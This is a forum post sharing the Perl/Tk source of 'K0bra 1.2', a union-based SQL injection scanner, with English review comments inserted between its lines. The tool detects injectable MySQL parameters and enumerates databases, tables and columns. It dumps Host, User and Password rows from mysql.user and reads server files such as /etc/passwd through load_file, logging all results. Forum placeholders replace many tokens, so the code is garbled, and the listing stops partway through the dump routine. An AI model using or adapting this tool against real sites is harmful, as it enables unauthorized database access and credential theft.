
[Perl Tk] K0bra 1.2


Desconectado BigBear

« en: Agosto 19, 2011, 11:28:44 pm »
Esta es la nueva versión de mi scanner SQLi, en la cual mejoré el diseño y arreglé algunas fallas en el script.

Una imagen sería:




Código: Perl
  1. #!usr/bin/perl
  2. #K0bra 1.2 (C) Doddy Hackman 2011
  # NOTE(review): wherever "You are not allowed to view links. Register or Login"
  # appears in this listing, the forum put its guest placeholder where a token
  # stood; the original token is not shown, so the listing does not parse as
  # printed. The leading "N." on each line is the forum's gutter number.
  # NOTE(review): the shebang has no leading "/", and neither strict nor
  # warnings is enabled, so the undeclared globals used below go unreported.
  3.  
  4. use Tk;
  5. use Tk::ROText;
  6. use Tk::PNG;
  7. use LWP::UserAgent;
  8. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  9.  
  # Script-wide defaults: $bypass is the style string handed to bypass();
  # every sub below that uses $save declares its own lexical of that name.
  10. my $bypass = "--";
  11. my $save = "";
  12.  
  # Prepare the log directories before any window is built.
  13. installer();
  14.  
  # NOTE(review): `use` is processed at compile time, so this `if` does not make
  # the Win32::Console import conditional on the platform.
  15. if ($^O eq 'MSWin32') {
  16. use Win32::Console;
  17. Win32::Console::Free();
  18. }
  19.  
  # One shared HTTP client for every request: 5-second timeout and a fixed
  # User-Agent. The string never varies (note "Gecko/20080201Firefox" with no
  # space), so it can serve as a search term in web-server logs.
  20. my $nave = LWP::UserAgent->new();
  21. $nave->timeout(5);
  22. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  23.  
  # Main window, 500x800 and not resizable; the logo is read from "mirar.png"
  # in the current directory.
  24. my $logo = MainWindow->new(-background=>"black",-foreground=>"green");
  25. $logo->title("K0bra 1.2 (C) Doddy Hackman 2011");
  26. $logo->geometry("500x800+20+20");
  27. $logo->resizable(0,0);
  28.  
  29. my $tomaboludo = $logo->Photo(-file => "mirar.png");
  30. $logo->Label(-background=>"black",-image =>$tomaboludo,-borderwidth=>0)->place(-You are not allowed to view links. Register or Login=>20,-x=>40);  
  31.  
  32. #
  # Target URL entry (pre-filled with a localhost example) and the Scan button.
  33. $logo->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>25,-You are not allowed to view links. Register or Login=>260);
  34. my $targetero = $logo->Entry(-width=>50,-text=>"http://127.0.0.1/sql.php?id=1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>263,-x=>90);
  35. $logo->Button(-text=>"Scan",-width=>10,-command=>\&start,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>260,-x=>400);
  36. #
  37.  
  38. $logo->Label(-text=>"Options",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>210,-You are not allowed to view links. Register or Login=>320);
  39.  
  # One button per action; each -command is a sub defined later in the file.
  40. $logo->Button(-text=>"Get DBS",-width=>10,-command=>\&getdbs,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>40);
  41. $logo->Button(-text=>"Get Tables",-width=>10,-command=>\&schematablesdb,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>120);
  42. $logo->Button(-text=>"Get Columns",-width=>10,-command=>\&schemacolumnsdb,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>200);
  43. $logo->Button(-text=>"mysql users",-width=>15,-command=>\&mynow,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>280);
  44. $logo->Button(-text=>"load_file",-width=>10,-command=>\&myfile,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>390);
  45.  
  46. $logo->Button(-text=>"Dump",-width=>10,-command=>\&dum,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>90);
  47. $logo->Button(-text=>"Hex",-width=>10,-command=>\&per1,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>170);
  48. $logo->Button(-text=>"ASCII",-width=>15,-command=>\&per2,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>250);
  49. $logo->Button(-text=>"Show Logs",-width=>10,-command=>\&china,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>360);
  50.  
  51. #
  52.  
  # Result widgets: a details list plus database, table and column lists that
  # the callbacks fill in.
  53. $logo->Label(-text=>"Details : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>500,-x=>90);
  54.  
  55. my $informatero = $logo->Listbox(-height=>5,-width=>40,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>480,-x=>160);
  56.  
  57. #
  58.  
  59. $logo->Label(-text=>"Databases",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>590,-x=>60);
  60. $logo->Label(-text=>"Tables",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>590,-x=>190);
  61. $logo->Label(-text=>"Columns",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>590,-x=>330);
  62.  
  63. my $datero = $logo->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>630,-x=>40);
  64. my $tablero = $logo->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>630,-x=>180);
  65. my $columnero = $logo->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>630,-x=>320);
  66.  
  67. #
  68.  
  69.  
  # Hand control to the Tk event loop; the subs below run as button callbacks.
  70. MainLoop;
  71.  
  # Callback for the "Scan" button. Calls a method (name hidden by the forum
  # placeholder) with ("0.0","end") on the four list widgets, reads the target
  # URL from the entry, and runs the probe sub defined right after this one.
  # When the probe reports $control equal to 1, the URL it returned is written
  # back into the entry and passed to details().
  72. sub start {
  73. msg("K0bra 1.2","Scan Started");
  74. $informatero->You are not allowed to view links. Register or Login("0.0","end");
  75. $datero->You are not allowed to view links. Register or Login("0.0","end");
  76. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  77. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  78.  
  79. my $tengo = $targetero->get;
  80.  
  # The second argument is the literal "--", not the script-level $bypass.
  81. my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($tengo,"--");
  # NOTE(review): `eq` compares as strings; $control is undefined when the
  # probe falls through without reaching its return.
  82. if ($control eq 1) {
  83. $logo->update;
  84. $targetero->configure(-text=>$gen);
  85. details($gen,$bypass,$save);
  86. } else {
  87. msg("K0bra 1.2","Not found length columns");
  88. }
  89. msg("K0bra 1.2","Scan Finished");
  90. }
  91.  
  # Probe sub called from start(); its name is hidden by the forum placeholder.
  # $_[0] is the target URL and $_[1] the bypass style. It requests the URL with
  # an "order by" suffix, checks the response for PHP/MySQL error text, compares
  # the responses to a 1=0 and a 1=1 condition, and then requests union selects
  # with 2..200 columns, each column carrying a RATSXPDOWN<n>RATSXPDOWN marker.
  # The first attempt whose response echoes a marker is logged and returned.
  # NOTE(review): the error-text test only succeeds when the application prints
  # database errors into the page; pages that suppress them never pass it.
  92. sub You are not allowed to view links. Register or Login {
  93. my $rows  = "0";
  94. my $asc;
  95. my $page = $_[0];
  # $pass1/$pass2 and most names below are undeclared package globals.
  96. ($pass1,$pass2) = &bypass($_[1]);
  97. $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  98. $code = toma($inyection);
  99. $logo->update;
  100.  
  # Only the first alternative has a capture group (the path inside <b>...</b>).
  101. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  102.  
  103. $logo->update;
  104.  
  105. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  106. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  107.  
  # Proceed only when the false and true conditions give different pages.
  108. unless ($testar1 eq $testar2) {
  # NOTE(review): $1 is read two toma() calls after the match that set it, and
  # it holds a path only if the first alternative of the regex was the one hit.
  109. my $patha = $1;
  110. $logo->update;
  111. You are not allowed to view links. Register or Login $patha;
  112. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  113. $total = "1";
  # This loop variable shadows the `my $rows` declared at the top of the sub.
  114. for my $rows(2..200) {
  115. $logo->update;
  116. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  117. $total.= ",".$rows;
  118. $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  119. $test = toma($injection);
  # A marker echoed in the response means a selected column is rendered.
  120. if ($test=~/RATSXPDOWN/) {
  121. @number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  122. $control = 1;
  # The log file's base name comes from the target URL (see comer()).
  123. my $save = comer($_[0]);
  124. savefile($save.".txt","\n[Target confirmed] : $page");
  125. savefile($save.".txt","[Bypass] : $_[1]\n");
  126. savefile($save.".txt","[Limit] : The site has $rows columns");
  127. savefile($save.".txt","[Data] : The number @number print data");
  128. $informatero->insert("end","[+] The site has $rows columns");
  129. $informatero->insert("end","[+] The number @number print data");
  130. if ($patha) {
  131. savefile($save.".txt","[Full Path Discloure] : $patha");
  132. }
  # The first reflected column number in $total is swapped for the literal
  # "hackman"; the other subs look for that word in the URL.
  133. $total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;
  134. savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  135. You are not allowed to view links. Register or Login($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  136. }
  137. }
  138. }
  139. } else {
  140. msg("K0bra 1.2","Not vulnerable");
  # NOTE(review): this `next` is not inside any loop of this sub.
  141. next;
  142. }
  143. }
  144.  
  # Fingerprints the database through the URL produced by the probe.
  #   $page   - URL containing the literal word "hackman" at the reflected column
  #   $bypass - style string passed to bypass()
  #   $save   - base name of the log file
  # Sends one request each against information_schema.tables and mysql.user,
  # one load_file() request, and one request concatenating version(),
  # database() and user(). The list char(69,82,84,79,82,56,53,52) spells the
  # marker "ERTOR854" that the response is searched for, and the hex literal
  # passed to load_file decodes to "/etc/passwd".
  # NOTE(review): an "ON" result means the application's database account can
  # read that object; an account limited to its own schema and without the FILE
  # privilege would report OFF and no [load_file] line.
  145. sub details {
  146. my ($page,$bypass,$save) = @_;
  147. ($pass1,$pass2) = &bypass($bypass);
  148. savefile($save.".txt","\n");
  # Everything before and after "hackman" becomes the request prefix/suffix.
  149. if ($page=~/(.*)hackman(.*)/ig) {
  150. my  ($start,$end) = ($1,$2);
  151. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  152. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  153. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  154. $test1 = toma($inforschema);
  155. $test2 = toma($mysqluser);
  156. $informatero->insert("end","");
  157. if ($test2=~/ERTOR854/ig) {
  158. savefile($save.".txt","[mysql.user] : ON");
  159. $informatero->insert("end","[mysql.user] : ON");
  160. } else {
  161. $informatero->insert("end","[mysql.user] : OFF");
  162. savefile($save.".txt","[mysql.user] : OFF");
  163. }
  164. if ($test1=~/ERTOR854/ig) {
  165. $informatero->insert("end","[information_schema.tables] : ON");
  166. savefile($save.".txt","[information_schema.tables] : ON");
  167. } else {
  168. $informatero->insert("end","[information_schema.tables] : OFF");
  169. savefile($save.".txt","[information_schema.tables] : OFF");
  170. }
  # Unlike the two checks above, a failed load_file test is not reported.
  171. if ($test3=~/ERTOR854/ig) {
  172. $informatero->insert("end","[load_file] : ON");
  173. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  174. }
  175. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  176. $injection = $start.$concat.$end.$pass2;
  177. $code = toma($injection);
  # The three captures are version, database name and user, in that order.
  178. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  179. $informatero->insert("end","");
  180. $informatero->insert("end","[+] DB Version : $1");
  181. $informatero->insert("end","[+] DB Name : $2");
  182. $informatero->insert("end","[+] user_name : $3");
  183. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  184. } else {
  185. msg("K0bra 1.2","Not Found DB Info");
  186. }
  187. }
  188. }
  189.  
  190.  
  # Callback for "Get DBS". Reads the URL from the target entry, replaces the
  # word "hackman" with a Count(*) expression to learn how many schemata exist,
  # then requests schema_name one row at a time with "limit <n>,1". Values are
  # recognised by the RATSXPDOWN1 marker (the char(82,65,...,78,49) list).
  # Names other than information_schema, mysql and phpmyadmin are listed and
  # logged. The operator applied to $page/$page1 is hidden by the placeholder.
  191. sub getdbs {
  192. $datero->You are not allowed to view links. Register or Login("0.0","end");
  193. my $page = $targetero->get;
  194. my $save = comer($page);
  195. my $page1 = $page;
  196. savefile($save.".txt","\n");
  197. ($pass1,$pass2) = &bypass($bypass);
  198. $page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  # NOTE(review): this count request is sent without the $pass2 terminator.
  199. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  200. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  201. my $limita = $1;
  202. $logo->update;
  203. savefile($save.".txt","[+] Databases Length : $limita\n");
  204. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  205. $real = "1";
  # NOTE(review): 0..$limita is inclusive, so one request more than the
  # reported count is sent.
  206. for my $limit(0..$limita) {
  207. $logo->update;
  208. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  209. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  210. my $control = $1;
  211. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  212. $datero->insert("end",$control);
  213. savefile($save.".txt","[Database $real Found] : $control");
  214. $real++;
  215. }
  216. }
  217. }
  218. } else {
  219. msg("K0bra 1.2","information_schema not found");
  220. }
  221. }
  222.  
  223.  
  # Callback for "Get Tables". For every database selected in the databases
  # list it asks information_schema.tables for a Count(*) filtered on
  # table_schema, then fetches table_name row by row with "limit <n>,1".
  # Results go into the tables list as "db.table" and into the log file.
  224. sub schematablesdb {
  225.  
  226. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  227.  
  228. my $page = $targetero->get;
  229.  
  230. my $save = comer($page);
  231.  
  232. $d = $datero->curselection();
  233.  
  234. for my $id (@$d) {
  235. my $db = $datero->get($id);
  236.  
  237. my $page1 = $page;
  238. savefile($save.".txt","\n");
  239. ($pass1,$pass2) = &bypass($bypass);
  240. savefile($save.".txt","[DB] : $db");
  # $page (shared across iterations) gets the table_name expression and
  # $page1 (a fresh copy per iteration) gets the Count(*) expression.
  241. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  242. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  # The database name is passed through ascii() and wrapped in char(...)
  # rather than sent as a quoted string.
  243. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  244. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  245. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  246. $logo->update;
  247. savefile($save.".txt","[+] Tables Length :  $1\n");
  248. my $limit = $1;
  249. $real = "1";
  # NOTE(review): inclusive range, one request more than the reported count.
  250. for my $lim(0..$limit) {
  251. $logo->update;
  252. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  253. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  254. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  255. my $table = $1;
  256. You are not allowed to view links. Register or Login $table;
  257. savefile($save.".txt","[Table $real Found : $table ]");
  258. $tablero->insert("end",$db.".".$table);
  259. $real++;
  260. }}
  261. } else {
  262. msg("K0bra 1.2","information_schema not found");
  263. }}}
  264.  
  # Callback for "Get Columns". For every "db.table" entry selected in the
  # tables list it asks information_schema.columns for a Count(*) filtered on
  # table_name and table_schema, then fetches column_name row by row with
  # "limit <n>,1". Names are shown in the columns list and logged.
  265. sub schemacolumnsdb {
  266.  
  267. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  268.  
  269. my $page = $targetero->get;
  270. my $save = comer($page);
  271.  
  272. $d = $tablero->curselection();
  273.  
  274. for my $id (@$d) {
  275. my $da = $tablero->get($id);
  276.  
  # NOTE(review): the greedy (.*) splits at the last dot, so a table name that
  # itself contains a dot is split in the wrong place.
  277. if ($da=~/(.*)\.(.*)/) {
  278. my ($db,$table) = ($1,$2);
  279.  
  280. my $page3 = $page;
  281. my $page4 = $page;
  282.  
  283. savefile($save.".txt","\n");
  284. ($pass1,$pass2) = &bypass($bypass);
  285. savefile($save.".txt","\n[DB] : $db");
  286. savefile($save.".txt","[Table] : $table");
  287. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  288. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  289. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  290. savefile($save.".txt","[Columns length : $1 ]\n");
  291. my $si = $1;
  292. You are not allowed to view links. Register or Login $si;
  293. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  294. $real = "1";
  # NOTE(review): inclusive range, one request more than the reported count.
  295. for my $limit2(0..$si) {
  296. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  297. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  298. $columnero->insert("end",$1);
  299. savefile($save.".txt","[Column $real] : $1");
  300. $real++;
  301. }
  302. }
  303. } else {
  304. msg("K0bra 1.2","information_schema not found");
  305. }
  306. }
  307. }
  308. }
  309.  
  # Callback for "mysql users". Opens a second window with a target entry
  # (pre-filled from the main window) and Host / User / Password lists; its
  # "Extract" button runs the nested sub tengorax.
  # NOTE(review): tengorax is a named sub declared inside mynow. Perl binds a
  # named sub to the enclosing lexicals of the first call only, so opening this
  # window a second time leaves tengorax tied to the first window's widgets.
  310. sub mynow {
  311.  
  312. my $p = $targetero->get;
  313.  
  314. $mi = MainWindow->new(-background=>"black",-foreground=>"green");
  315. $mi->title("Mysql Extractor");
  316. $mi->geometry("500x300+20+20");
  317. $mi->resizable(0,0);
  318.  
  319. $mi->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  320. my $guix = $mi->Entry(-width=>40,-text=>$p,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  321. $mi->Button(-width=>10,-text=>"Extract",-command=>\&tengorax,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  322.  
  323. $mi->Label(-text=>"Host",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>60,-You are not allowed to view links. Register or Login=>90);
  324. $mi->Label(-text=>"User",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>200,-You are not allowed to view links. Register or Login=>90);
  325. $mi->Label(-text=>"Password",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>360,-You are not allowed to view links. Register or Login=>90);
  326.  
  327. my $hostero = $mi->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>40);
  328. my $usero = $mi->Listbox(-width=>23,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>180);
  329. my $pasero = $mi->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>340);
  330.  
  331.  
  # Checks that mysql.user is readable, reads its row count, then requests the
  # Host, User and Password columns one row at a time. The hex literal
  # 0x524154535850444f574e spells the separator "RATSXPDOWN".
  # NOTE(review): each row is appended to the log file as plain text, so the
  # file ends up holding whatever the Password column contained.
  332. sub tengorax {
  333.  
  334. my $page = $guix->get;
  335. my $save = comer($page);
  336.  
  337. my $cop = $page;
  338. my $cop1 = $page;
  339. savefile($save.".txt","\n");
  340.  
  341. ($pass1,$pass2) = &bypass($bypass);
  342. $page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  343. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  344. if ($code=~/RATSXPDOWN/ig){
  345. $cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  346. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  347. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  348. $mi->update;
  349. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  # The range is evaluated once from $1; the loop ends early through `last`
  # on the first response without the separators.
  350. for my $limit(0..$1) {
  351. $mi->update;
  352. $cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  353. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  354. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  355. $mi->update;
  356. $hostero->insert("end",$1);
  357. $usero->insert("end",$2);
  358. $pasero->insert("end",$3);
  359. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  360. } else {
  361. last;
  362. }}}
  363. } else {
  364. msg("K0bra 1.2","mysql.user not found");
  365. }
  366. }
  367. }
  368.  
  # Callback for "load_file". Opens a helper window with a target entry, a file
  # path entry (pre-filled with a Windows XAMPP path), Encode and Show buttons,
  # and a read-only output box. The nested subs eno and ena are the button
  # callbacks.
  # NOTE(review): eno and ena are named subs declared inside myfile, so they
  # stay bound to the widgets created by the first call of myfile.
  369. sub myfile {
  370.  
  371. my $pag = $targetero->get;
  372.  
  373. $loa = MainWindow->new(-background=>"black",-foreground=>"green");
  374. $loa->title("load_file helper");
  375. $loa->geometry("380x410+20+20");
  376. $loa->resizable(0,0);
  377.  
  378. $loa->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  379. my $aa = $loa->Entry(-width=>40,-text=>$pag,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>23,-x=>80);
  380. $loa->Label(-text=>"File : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>60,-x=>23);
  381. my $tea = $loa->Entry(-width=>20,-text=>"C:/xampp/htdocs/aca.txt",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>63,-x=>63);
  382. $loa->Button(-text=>"Encode",-width=>8,-command=>\&eno,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>62,-x=>200);
  383. $loa->Button(-text=>"Show",-width=>8,-command=>\&ena,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>62,-x=>263);
  384.  
  385. $loa->Label(-text=>"Output",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>160,-You are not allowed to view links. Register or Login=>130);
  386. my $mo = $loa->ROText(-width=>45,-height=>15,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>170,-x=>25);
  387.  
  # Toggles the file entry between plain text and its 0x... hex form; any
  # text containing "0x" anywhere is treated as already encoded.
  388. sub eno {
  389. my $t = $tea->get;
  390. if ($t=~/0x/) {
  391. $tea->configure(-text=>decode($t));
  392. } else {
  393. $tea->configure(-text=>encode($t));
  394. }
  395. }
  396.  
  # Requests load_file(<file entry text>) wrapped in "k0bra" markers (the
  # char(107,48,98,114,97) list) and shows and logs whatever lies between them.
  397. sub ena {
  398.  
  399. $mo->You are not allowed to view links. Register or Login("0.0","end");
  400.  
  401. my $page = $aa->get;
  402. my $save = comer($page);
  403.  
  404. savefile($save.".txt","\n");
  405. ($pass1,$pass2) = &bypass($bypass);
  406. if ($page =~/(.*)hackman(.*)/g) {
  407. my $start = $1; my $end = $2;
  408. my $file = $tea->get;
  409. You are not allowed to view links. Register or Login $file;
  # The entry text is placed inside load_file(...) as typed, without quotes.
  410. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".$file."),char(107,48,98,114,97))))";
  411. my $code = toma($start.$concat.$end.$pass2);
  412. You are not allowed to view links. Register or Login $code;
  413.  
  # The regex modifier after the closing slash is hidden by the placeholder.
  414. if ($code=~/k0bra(.*)k0bra/You are not allowed to view links. Register or Login) {
  415. my $word = $1;
  416. $mo->insert("end",$word);
  417. savefile($save.".txt","[File Found] : $file");
  418. savefile($save.".txt","\n[Source Start]\n");
  419. savefile($save.".txt","$word");
  420. savefile($save.".txt","\n[Source End]\n");
  421. } else {
  422. msg("K0bra 1.2","Error");
  423. }}}}
  424.  
  # Callback for "Dump". Opens a window asking for a target URL, a table name
  # and two column names, with two lists for the results; the "Extract" button
  # runs the nested sub tengor.
  # NOTE(review): tengor is a named sub declared inside dum, so it stays bound
  # to the widgets created by the first call of dum.
  425. sub dum {
  426.  
  427. my $pa = $targetero->get;
  428.  
  429. $max = MainWindow->new(-background=>"black",-foreground=>"green");
  430. $max->title("Dump Values");
  431. $max->geometry("480x380+20+20");
  432. $max->resizable(0,0);
  433.  
  434. $max->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  435. my $tata = $max->Entry(-width=>40,-text=>$pa,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  436.  
  437. $max->Label(-text=>"Table : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>50,-You are not allowed to view links. Register or Login=>60);
  438. my $tato = $max->Entry(-width=>20,-background=>"black",-foreground=>"green")->place(-x=>105,-You are not allowed to view links. Register or Login=>63);
  439.  
  440. $max->Label(-text=>"Column1 : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>90,-x=>50);
  441. my $tatu = $max->Entry(-width=>20,-background=>"black",-foreground=>"green")->place(-x=>130,-You are not allowed to view links. Register or Login=>93);
  442.  
  443. $max->Label(-text=>"Column2 : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>50);
  444. my $tita= $max->Entry(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>133,-x=>130);
  445.  
  446.  
